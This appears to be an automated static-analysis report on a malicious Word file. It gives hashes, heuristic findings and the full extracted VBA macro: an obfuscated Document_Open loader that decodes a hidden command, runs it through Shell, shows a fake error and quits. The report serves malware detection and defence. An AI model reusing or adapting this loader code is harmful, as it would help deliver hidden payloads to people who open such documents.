Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c8ef51f95aba9a36…

MALICIOUS

Office (OLE)

72.0 KB Created: 2016-09-01 10:55:00 Authoring application: Microsoft Office Word First seen: 2016-10-06
MD5: 3b6c5c53a58f24980bb1528372373162 SHA-1: a5afff3efc4cc032f8a1aa6b9e5799761fdda799 SHA-256: c8ef51f95aba9a369f3bdfd8326df837bd9dd1be33ed26e18aaea989046aacbd
178 Risk Score

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment T1059.005 Visual Basic

The sample contains a VBA macro with an auto-exec loader that is obfuscated and attempts to call shell commands. The macro's Document_Open subroutine constructs a command string using Environ and Shell calls, likely to download and execute a second-stage payload. The document body and heuristics indicate a lure to enable content, which is a common tactic for macro-based malware.

Heuristics 7

  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Shell Environ$(StrReverse(Hex2Str(DecryptEPI("@?@AA<A?@h@j@?")))) & StrReverse(Hex2Str(DecryptEPI("><B?>j><"))) & YIuzoOfrXsQhSTQIgYewsVFeYzSOUbDRtRMPjGYBYzSMYSSHQWmYIiveJitBHMC, vbHide
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    Shell Environ$(StrReverse(Hex2Str(DecryptEPI("@?@AA<A?@h@j@?")))) & StrReverse(Hex2Str(DecryptEPI("><B?>j><"))) & YIuzoOfrXsQhSTQIgYewsVFeYzSOUbDRtRMPjGYBYzSMYSSHQWmYIiveJitBHMC, vbHide
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    Shell Environ$(StrReverse(Hex2Str(DecryptEPI("@?@AA<A?@h@j@?")))) & StrReverse(Hex2Str(DecryptEPI("><B?>j><"))) & YIuzoOfrXsQhSTQIgYewsVFeYzSOUbDRtRMPjGYBYzSMYSSHQWmYIiveJitBHMC, vbHide
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2565 bytes
SHA-256: 00cbcb49fbc1961e16f07a6e8df5979d699cab7c01bfc356bf69009077aa25d2
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'Begin Code
Option Explicit
Private Sub Document_Open()
Dim YIuzoOfrXsQhSTQIgYewsVFeYzSOUbDRtRMPjGYBYzSMYSSHQWmYIiveJitBHMC As Variant
YIuzoOfrXsQhSTQIgYewsVFeYzSOUbDRtRMPjGYBYzSMYSSHQWmYIiveJitBHMC = StrReverse(Hex2Str(DecryptEPI(">CBACFBA>iCBC>A?C<@=BGBhACAg>A@=A@@=@@A<A<@=@g@=@?@j@g>A>C><C?C?BAB?BjC>A<>hC@C>B=C@A??f>G>CBACFBA>iCBC>A?C<@=BGBhACAg>A@=A@@=@@A<A<@=@g@=@?@j@g>A>C>g>CBACFBA>i@jA@?>?GA@C@?GCBC?B>AACCBAC>>j?<?A?=>i?<?@>i?>?@?>>i?<?G?=>j>j?eC<C@C@BF>C>FBABgBG@BB@B=BjBgBiCCBj@@>i>GC@BiBABGBg@?B>BAAC>iC@BA@i>iBhBAC@C?CGA?><C@B?BABeB>@j>hCCBA@i>F><BgBgBABFA?C>BACCBjA<")))
Shell Environ$(StrReverse(Hex2Str(DecryptEPI("@?@AA<A?@h@j@?")))) & StrReverse(Hex2Str(DecryptEPI("><B?>j><"))) & YIuzoOfrXsQhSTQIgYewsVFeYzSOUbDRtRMPjGYBYzSMYSSHQWmYIiveJitBHMC, vbHide
Dim title As String
title = StrReverse(Hex2Str(DecryptEPI("C>BjC>C>@A><BAB?BGBBBB@j><C@BBBjC?BjC>B?BG@h><BgB=B?BGC@BGC>@?")))
Dim msg As String
Dim intResponse As Integer
msg = StrReverse(Hex2Str(DecryptEPI(">iC<CABfB?B=B>><B=><BhBjC>BB><BABgBGBB><C?BGBFC@><BAC>BjC@C?BAC>><BAC?B=BABgA<><>iBAC>BjC@C?BAC>><BjC@><C>BAB@C>Bj><BiBG><C?CCBjC>><BgB=B?BGC@BGC>B?><BCBiBGC?C?BGBh><C>Bj><C@C<CAC>C>BjB?><BAB>><BjC@><C?C>B=BAC<C<B=><C@BiBABhCAB?BjB@><C?BGBFA@")))
intResponse = MsgBox(msg, 16, title)
Application.Quit
End Sub
Public Function Hex2Str(ByVal strData As String)
Dim second As Long, CryptString As String, tmpChar As String
    On Local Error Resume Next
    For second = 1 To Len(strData) Step 2
        CryptString = CryptString & Chr$(Val(DecryptEPI(".n") & Mid$(strData, second, 2)))
    Next second
    Hex2Str = CryptString
End Function


Public Function DecryptEPI(sString As String) As String
    Dim I As Integer
    Dim sLen As Integer, sBuffer As String
    sLen = Len(sString)
    For I = 1 To sLen
        sBuffer = sBuffer & Chr(Oct2Dec(Asc(Mid(sString, I, 1))))
    Next I
    DecryptEPI = sBuffer
End Function

Private Function Oct2Dec(Number As String) As Integer
    Dim I As Integer
    Dim sLen As String, sBuffer As Integer, iNumb As Integer
    sLen = Len(Number)
    For I = 0 To sLen
        iNumb = Val(Mid(StrReverse(Number), I + 1, 1))
        sBuffer = sBuffer + ((8 ^ I) * iNumb)
    Next I
    Oct2Dec = sBuffer
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.